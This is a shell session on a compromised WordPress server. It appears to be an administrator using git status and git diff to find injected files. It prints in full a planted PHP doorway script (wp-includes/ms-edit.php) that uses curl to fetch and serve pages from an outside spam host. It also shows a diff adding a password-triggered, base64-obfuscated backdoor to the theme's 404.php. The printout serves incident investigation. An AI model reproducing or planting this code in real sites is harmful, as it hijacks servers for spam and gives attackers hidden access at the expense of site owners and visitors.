root@web:/var/www# git status# On branch working-website# Changes not staged f

1. root@web:/var/www# git status
2. # On branch working-website
3. # Changes not staged for commit:
4. # (use "git add <file>..." to update what will be committed)
5. # (use "git checkout -- <file>..." to discard changes in working directory)
6. # (commit or discard the untracked or modified content in submodules)
7. #
8. # modified: .htaccess
9. # modified: webalizer/index.html
10. # modified: webalizer/usage.png
11. # modified: webalizer/webalizer.hist
12. # modified: wp-content/plugins/no-disposable-email/no_disposable_email.log
13. # modified: wp-content/themes/twentytwelve/404.php <===========
14. #
15. # Untracked files:
16. # (use "git add <file>..." to include in what will be committed)
17. #
18. # webalizer/ctry_usage_201407.png
19. # webalizer/daily_usage_201407.png
20. # webalizer/hourly_usage_201407.png
21. # webalizer/usage_201407.html
22. # wp-includes/ms-edit.php <=================
23.  
24. root@web:/var/www# more wp-includes/ms-edit.php
25. <?php $url = "http://admindors.com/redbutton/main2-dors/20j-107-1/"; $e = '.php'; $q = ""; $test = 'suka-test'; if ((!$q || isset($_GET[$q])) && preg_match("/^[^/][a-z0-9-_/.]+$/i", $a = $q ? $_
26. GET[$q] : $_SERVER["QUERY_STRING"])) { if($test && $a == $test) { echo 'OK'; exit; } curl_setopt($ch = curl_init($url.($w=preg_replace("/^([a-z0-9-_]+)(.php|.html|/|)$/i", '$1'.$e, $a, -1, $h)))
27. , CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); if (isset($_SERVER[
28. "HTTP_REFERER"])) curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]); $result = curl_exec($ch); if ((($c = curl_getinfo($ch, CURLINFO_HTTP_CODE)) == 301 || $c == 302) && ($u = curl_getinfo
29. ($ch, CURLINFO_EFFECTIVE_URL))) { header('Location: ' . $u, true, $c); exit; } else if ($c == 200 && $result) { header('Content-Type: ' . curl_getinfo($ch, CURLINFO_CONTENT_TYPE)); echo ($h || subs
30. tr($a, -4) == '.css') ? preg_replace('/<a(.*?)href=["'](' . preg_quote(($t = ((!strncmp($_SERVER["REQUEST_URI"], $t = $_SERVER["SCRIPT_NAME"], strlen($t))) ? ($t . '?' . ($q ? $q . '=' : '' )) : '
31. /' . substr($_SERVER["REQUEST_URI"], 1, -strlen($a))) . ((substr($a, -1) != '/' && ($y = strrpos($a, '/'))) ? substr($a, 0, $y) . '/' : '' )), '/') . '[a-z0-9-_]+)(' . preg_quote($e) . ')["'](.*?)
32. >/i', '<a$1href="$2' . (($h = strlen($w) - strlen($e) - strlen($a)) < 0 ? substr($a, $h) : "") . '"$4>', preg_replace('/<(a|link|img)(.*?)(href|src)=["']([^/][a-z0-9-_./]+)["'](.*?)>/i', '<$1$
33. 2$3="' . $t . '$4"$5>', preg_replace('/background(-image:|:)(.*?url(["'])([^/][a-z0-9-_./]+)(["']))/i', 'background$1$2' . $t . '$3$4', $result))) : $result; exit; } } header('HTTP/1.0 404
34. Not Found', true); exit; ?>
35.  
36. root@web:/var/www# git diff wp-content/themes/twentytwelve/404.php
37.  
38. diff --git a/wp-content/themes/twentytwelve/404.php b/wp-content/themes/twentytwelve/404.php
39. index e7270b4..189b69c 100644
40. --- a/wp-content/themes/twentytwelve/404.php
41. +++ b/wp-content/themes/twentytwelve/404.php
42. @@ -1,3 +1,9 @@
43. +<?php^M
44. +if(isset($_GET['pwd'])) {^M
45. +$_F=__FILE__;$_X='P2lCPz5NY2VXKDxlbk1bVV85TTJPOU0oJzhDcjA5Qy5BMkNyNTJxRlAzLzh5YlR1THU0RlVFa0VXRUMzVXU0S0xFWWJrdVlifWJUOXlOVDgKYlRXV2JxMzE0d095YmtQbjxKM3htcEZzM2tnWUVwMzE0d095TkM2WWJENm45clAuYkpnWj
46. +^M
47. +} else {^M
48. +?>^M
49. <?php
50. /**
51. * The template for displaying 404 pages (Not Found).
52. @@ -26,4 +32,7 @@ get_header(); ?>
53. </div><!-- #content -->
54. </div><!-- #primary -->
55.  
56. -<?php get_footer(); ?>
57. No newline at end of file
58. +<?php get_footer(); ?>^M
59. +<?php^M
60. +}^M
61. +?>
62. No newline at end of file